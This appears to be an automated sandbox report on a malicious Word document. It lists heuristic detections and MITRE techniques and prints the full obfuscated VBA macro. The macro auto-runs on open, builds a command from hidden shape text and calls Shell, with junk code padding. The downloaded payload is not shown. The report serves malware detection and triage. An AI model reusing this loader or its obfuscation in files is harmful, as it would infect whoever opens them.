Verdict: MALICIOUS
Risk Score: 272

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1059.001 PowerShell
- T1204.002 Malicious File
The sample contains VBA macros that are automatically executed upon opening the document. These macros utilize Shell() calls to invoke cmd.exe with obfuscated parameters and also reference PowerShell, indicating an attempt to download and execute a secondary payload. The presence of these indicators strongly suggests a macro-based malware delivery mechanism.
Heuristics (9)
- ClamAV: Doc.Malware.Generic-6774449-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Malware.Generic-6774449-0
- VBA macros detected [medium, OLE_VBA_MACROS, 3 related findings]: Document contains VBA macro code
- Potential Shell call in VBA [critical, OLE_VBA_SHELL]: Potential Shell call in VBA.
  Matched line in script (with surrounding lines): End Select / FtwhjPq = Array(hiVNVLv, KLAVpY, GKEbDmF, Interaction.Shell(sEjRuJQiwTR, YlMXKBAfFO), qKtzWspp) / Select Case SNnaZrTmLHiHUY
- VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Document_Open macro [low, OLE_VBA_DOCOPEN]: Document_Open macro.
  Matched line in script (with surrounding lines): Attribute VB_Customizable = True / Private Sub Document_open() / On Error Resume Next
- Suspicious cmd.exe invocation with execution flag [high, SC_STR_CMD]
- Reference to PowerShell [high, SC_STR_POWERSHELL]
- Suspicious extracted artifact [info, EXTRACTED_FILE_STATIC_TRIAGE]: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9695 bytes |

SHA-256: 3fbf482cbb2dc66e86c9325705827acb199d7c61d407a5191c16f173836c2e35
Detection (ClamAV): No threats found
Obfuscation or payload: likely. 217 of 259 identifiers look randomly generated (e.g. 'KVAZbOhGkhrQLjishEwKrFnV'), consistent with name-mangling obfuscation.

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "KatBHriqA"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
Select Case EfzzTlQZzBMMktzrwGFK
Case 302985658
QIstfUNWUqiDVh = 292571205
LHnwtzHrASulJYSolC = 99715709
EZFvMcjVdjYPzcvwXvHSBBt = ChrB(87375796 / ChrB(167004301))
NwYtSSSBPlBrmRQmOTt = mjdTRpvwpCjsWlPkzjOF
Case 324156529
MJzfJqBPnZTuojSFccXVLNEI = 141838337
BfoiFnhpUTVmfE = 308291839
PHYcwiRrHlibmzEoJIo = ChrB(144101470 / ChrB(172414226))
UfMzMzjqzSbkzzj = 299235113
End Select
Select Case uGwHAXwXTzhoJFPAhrzj
Case 178087394
jOfVWJzUkrSzjDdMQEs = 94324861
aPwYCCBuwkQCWXkci = 8196952
XzPqVKYMXUavnMHIwjwUGw = ChrB(170551761 / ChrB(247474683))
CzKjskmDDqRLYcO = piZXpdpOOlvhhiYZdkTM
Case 88957913
ikorkVpzZEipQUANRYHv = 113958848
pEWURshoICQJzpj = 325493894
TZRMqzrREYQSuFRPXvkVPDw = ChrB(107467911 / ChrB(244416707))
fYHULiUjnWAuwEiCNTQWNwzu = 186897929
End Select
Select Case CqWjOCvTYSYPziwtiww
Case 262999763
OjkTddIGcBuPQBpjj = 88807945
wAUfRzwKnrsGhkLoHlN = 246845942
nNvQdAicGKvjWrNtETU = ChrB(201888119 / ChrB(119606277))
PkuNiFNiwVbBJnZOoz = ijjwXLtzuDSsGGSzL
Case 145497373
VcOYMZHVhaTpfVOjo = 229686226
XClHSffcVurpOsXdnUITWQ = 276321706
XbNnXsXiOXwNjVvt = ChrB(215813596 / ChrB(324962136))
aqkFzHrbPfPQHMakrRsFcW = 83218094
End Select
Select Case WBNZLPNajBIlhUnzhULqcGLi
Case 229906709
QiXQOEDnhZaTzoQ = 232642300
CoLbWccJIlOUPqiqEwiD = 120150696
EhumOYOXWataIuXftGuHGS = ChrB(269177929 / ChrB(119361431))
jwdtqljNPjihkOEvk = oboijSYEXIKjmscUi
Case 183742536
djoNNtKtwJsqMVCAqdAMK = 140114537
NXCizlFPjcKGizOboZZav = 207311510
wKjslrdPaIvbpKKNH = ChrB(291626007 / ChrB(300755074))
NBOUBbBLnkvpiFE = 157875276
End Select
Select Case qdGzvoGfpGBSIcMS
Case 309956009
XVlTJBdhGDONwRLvO = 254393417
XLofVkzvZcaBHHkMUZWTFTNh = 20513322
bIjHMNZTXFiqQiKFE = ChrB(37989858 / ChrB(213147658))
GGNErVrStDwHbE = rLSPMcojfiiJoJz
Case 99855011
BBKVviPqVGaUHbO = 73635738
TtmqTZSXhaNMDJtoqFa = 306615690
vhCYrVNOYCPwNpFcRhcswN = ChrB(27491890 / ChrB(18724386))
SwjjRVoQmXMkRcDEIJXz = 94764692
End Select
Set UYFNjwnYZ = KatBHriqA.Shapes(iLShBW + "sqicjuu" + wwPrJ).TextFrame
Select Case pHtYqjLtkJJvzjb
Case 182326675
HhYHiRYFQwABRiaFWzajF = 274545582
JnUkjRFrHHmfjpALq = 136857175
akKsTfjpciAvfROPTJ = ChrB(213325854 / ChrB(271443232))
KHttiwqPWlkLmPizvAFAbd = GMHOUajCJfiPcRw
Case 268314099
sZGzQjsBfQYIbpMhzmhWk = 142829940
pjajHAGhwMXHCXLqcOMoKH = 297746231
qSidfQRwWkQNpDlBZicwD = ChrB(220856429 / ChrB(68532068))
nvEIXjihqsppRcCf = 305400112
End Select
Select Case tnSTkBuLXZEMibRvjuBMP
Case 139868938
ohfMYDjijjNqJNcRbBjfQpSw = 244013638
GSzLUSYodmFpWI = 282899114
VfUlHiGcaKipizOibYwNiXLv = ChrB(117297368 / ChrB(140401773))
qLmfXoUUnczsYMWlKjiGi = WNwMdRwUYTmwQRofKBN
Case 205249475
GbjXBImBLjPESoYjLLD = 142608249
DfFZwFwiZhszzQlSpb = 58337930
SMkXuwcQwzpJJIDw = ChrB(174168355 / ChrB(325378365))
CpWmCWFUYmOVjvJ = 425149
End Select
Select Case DQNjqVZDvvlVpjAozaPjOF
Case 82920244
PazshOAtZOEvoLblzF = 311629366
ZRZzLIWDzHXzEpRQX = 218348860
jvsvbcEAnzijJKuzzA = ChrB(330320036 / ChrB(219330194))
swvRrGrwuKNSjOWhVzW = HiESaNnJsTPZzzo
Case 335059556
dkVMCtoQOavYPbDbaRJscqdT = 227569234
auoSmaXlrMBtFpP = 16497718
nrkcrMwZfiGTnHBi = ChrB(317948042 / ChrB(123141848))
cvoUAikqajLUcadqczdiipt = 41023947
End Select
Select Case DJjSEifhOHEkzYAS
Case 216068744
wKzMNlQNYfAwMaoOODGtw = 192285079
RnDfCmVkOwIMiNqwvBqGzhRu = 197735308
kJwLnlVNiZKGObDvlzENGBYH = ChrB(77062413 / ChrB(290354924))
XwjVIBGBLnDLWrU = RmonPCEwTqQqjlpzvjzR
Case 336745060
BFIZrHimiWlWHV = 151041559
pUrmBSkQSazDQqt = 20178989
MkjfqLzOhIuEMiUcqqdZ = ChrB(80536772 / ChrB(16269359))
UsHRJfVrciquknZzIuYTJ = 278668537
End Select
Select Case GNibNRBllmZvoajpmKnPRzA
Case 254644916
kzbRNXswaSSoIzUAvnwm = 235094167
zhMKvMwZINrwcTaUYPjwOHQB = 198596046
TPVKDzsowtFCbjzA = ChrB(69137988 / ChrB(37165150))
KVAZbOhGkhrQLjishEwKrFnV = OVozzOzKDUsSptvWtHHG
Case 191394453
WsnSwMvFEhftNtsGlTuFHMq = 172289972
KCowzfPDUzwLjSkPwPKnwjC = 196104398
WoLXmKCNblJHHGCQqsuwuF = ChrB(6747448 / ChrB(65581983))
IwjmviAKLbrDjhptwFjaHrJ = 54496962
End Select
sEjRuJQiwTR = UYFNjwnYZ.ContainingRange + HhrRnBjd + ajHJzv + UjiRn + MKKFC + pqscTK + zEbXX + RKvizJ + CfvRTSz + wKqQQUb + LKGdi + uRXVIaG + pzYtki + BYMiIAqT
Select Case jAIlFZTQiTWbIw
Case 303510966
zmjsoSownMJZAXK = 305096374
MtFEHjrOlQQlhhUDuFZwj = 90335172
MLztPtPKJbuwCoDqG = ChrB(292375651 / ChrB(195224360))
BYLGipWGSkwzwb = tJmbUVFGJnlSOqPTFFKPozr
Case 95165351
XJsZfwwbwKjTQJhvRBT = 298122397
HQCQqrnMEuSYBwMNhd = 280241664
rSjjApwdTWzYVDQtqIpEKP = ChrB(287610528 / ChrB(106244597))
uPMVikXcGfojTQBu = 65070697
End Select
Select Case zKbKBGuWwoZEJAjAbb
Case 32792983
wBOHEFZbqElTNpYhM = 344208
QPzVDsatLiiPBwzXwvTFvjTf = 300472905
FrTbwobcoBwjLP = ChrB(196905285 / ChrB(82696763))
wIpkVPSclsuDjwSbA = jakjtnZKwZPkDbiSWXESkc
Case 7269036
MwjYFEjEKdumdQPBLKTsMBoT = 138459047
ZvXiBHZlTzHAFrsKZ = 175611557
woGHCHZIImLHNDoflhcb = ChrB(261371211 / ChrB(87878369))
wRuKFbABbOmYbTnVacwQzIq = 302489075
End Select
Select Case QaFlwnNLRGYahDbhDEDKMLwH
Case 99461615
cQWKrlmwDhnjDAXC = 290651975
aVYPZzmqztkEizWmLwp = 50293079
nnjztuTADnKTWjtlN = ChrB(288516685 / ChrB(153415485))
AmtNzDpNRpbNkKnhoPf = SpwGalHRcBwERjO
Case 3091730
WApEGjNMwiMsLwzMRFLqmnN = 318663520
kPrWvBvnnSPqALGiudC = 307877144
RFAszdDJIimtjWTWpAh = ChrB(109699847 / ChrB(36565427))
dhWRuEIsJLBzTKqivXs = 193183989
End Select
Select Case IRJPZwTREAIQvADmDVOH
Case 232329794
ROLFijphBBzXrYndOihv = 241454098
jHiOqCbohGuczuDTS = 257953950
XwHRXJizaHkanuCfEWQp = ChrB(255714183 / ChrB(38375481))
TsdOYtavMtTNQcpK = LDBjzjGizPwwCzp
Case 113139361
nZuuGFzMYjUjmCOMKijEj = 145931801
WfbibwJwdwipQQKF = 325362337
UZAmBLMjkrTGME = ChrB(114055019 / ChrB(82270249))
PibYNOjqkHNwvAYmDMw = 82449979
End Select
Select Case jXHNotbPKBFlmffsYKG
Case 282891040
hNwliiEbtkUBdZ = 60110907
rViAdjDULSlRvH = 215224498
oZBJKbKLXoRRlkJFW = ChrB(268607460 / ChrB(217854902))
bqWzKcZLwmflDCMDXzsPLS = oSmibJjvGarpwCEzhCwP
Case 243848706
fNiXGiWvRdJOiiX = 304216272
CQqYKLNOASALNMDrjnYAEDzZ = 71962091
OjkUabnDwzujVCV = ChrB(56166336 / ChrB(40395521))
VkERGWCrwuuzSROBz = 216484479
End Select
Select Case MnwAHQMJwdzSXUawRpRWK
Case 49909692
JvXoNJAiLvvQhWEh = 89718402
NAjvjiEibLZjfaFb = 257237496
jbzAwzoWbDtbMID = ChrB(53522979 / ChrB(325835547))
dOLsjihoEiPVKGj = wlOMDjHMDBlzwRcXcwwYtrrR
Case 123521706
vJHFtmrNKStkDtH = 336755534
iziqmCrtMILFHuztwozFzI = 333383299
kHKiruERuBJTkQI = ChrB(49034278 / ChrB(104162790))
jijICXwrGEJtrawZ = 41558468
End Select
Select Case KTdRtoOOAOAILn
Case 91158619
IrTFRSplOEDaATmrPvUoI = 286990983
ZIlUjtppwpLIGpC = 254198587
irDoloOhcJtPSZbRitwjwFs = ChrB(167930896 / ChrB(103522429))
loKfBMJdKRoUoUX = HkvZdPkrYwGGsYwdZiCZWw
Case 46793727
GpPJcNFbJMzIdqiVETHF = 41275774
klTLvKRzQKdPTn = 4558619
OKriwjbpzizhVCpBaDF = ChrB(196779335 / ChrB(276693462))
SuJLvnfOXqUdFwObG = 25331237
End Select
Select Case wibEfBiDmKvCHwVDamZN
Case 302188220
iGzPSMcnvCjrMfBLWKjXzn = 12626716
KjFUtRilkIAUEQiRbzOtT = 108785457
pCOQPiWpqFPEiGHtiUwHE = ChrB(206851022 / ChrB(219950166))
GbRvzYIQuwQSfBS = NSJPoMzLTGkZUJj
Case 65649645
HJnMaqSwwJkqpOcBrt = 248372023
SRubGctojwlRGzXrit = 252783718
rSqCPUdrHXdPvoCpPMGw = ChrB(317826249 / ChrB(199345666))
CYSjsqkWzHJizbrL = 247684267
End Select
Const YlMXKBAfFO = 0
Select Case ESFVSWTaABXkPco
Case 272361450
jDYqmLwCCUGLEAPzoo = 133226252
biwsjEjBwSqOkobuTSSGJSQ = 12829640
OwAIlaoUwrwGfJhc = ChrB(308713271 / ChrB(27552668))
iraQZUfWWNjISufRIitNr = uowconIkiOOjXV
Case 266208257
boFESHMijLAsZtBrsbzl = 131567734
fsNljVulXKdcHFHmkmcNwdnQ = 72116205
MXnvYCLfINqjYrounpOwm = ChrB(321083104 / ChrB(231755479))
rKJGzCEwawIWwbl = 174947366
End Select
Select Case GuMAsiQXXhLwrmCw
Case 270577379
HFduNjnQzYQSUY = 220597050
CztZqjfpjGTNICHpGVZskMh = 192812114
cisGFMmOwjDFPMXZ = ChrB(262946599 / ChrB(92615355))
PZHzQbMzwoIqRPM = BmiaujwJSEkqICSw
Case 329542862
OmUkbfsMoaqtlpCwWnF = 257874490
iazfMrVqwWMsrBZs = 110633388
CihsYTZTunKjfqKN = ChrB(210308044 / ChrB(79682046))
FPoXWsDiAtncFFcDFf = 274190602
End Select
FtwhjPq = Array(hiVNVLv, KLAVpY, GKEbDmF, Interaction.Shell(sEjRuJQiwTR, YlMXKBAfFO), qKtzWspp)
Select Case SNnaZrTmLHiHUY
Case 332391987
YIcIAbHHQlQjiZYtW = 122032941
HjhGNqCkMwPcmQ = 233372889
vqtBrFjKnbmIljp = ChrB(246841523 / ChrB(14096174))
rhrBPRwqvIBJdQvVcC = QLBDXSlDuwcJdaQZBNu
Case 178958212
DAKYIizWNQHmJlJpiTi = 194081950
ErSwXjMrtHibANLr = 206245899
onhhiVXUoHjXtLzNw = ChrB(56529878 / ChrB(286587431))
lvlfTIZKIYwwwFupjXJ = 324988979
End Select
Select Case iJjBPrdwWwYEVFmDFJurWd
Case 99016873
tipGNmjMQUCRPthqXjBB = 146518008
LQXrtjhJQAuFHkBWikQMoBCU = 266645949
bEUnbNIuTYjWswfG = ChrB(23413607 / ChrB(11633140))
JlwpAARkJKJOCDhIdp = YhzMQdmMrUhhzAziafOT
Case 251785506
cwkKKhTKoCRZcpMY = 207295343
NoZQcdLNEYGcOVrO = 29298394
cGSFtjfiPYXISCzCGzkMVHww = ChrB(192891038 / ChrB(308657195))
LnwiOlMvYtIusk = 328622738
End Select
End Sub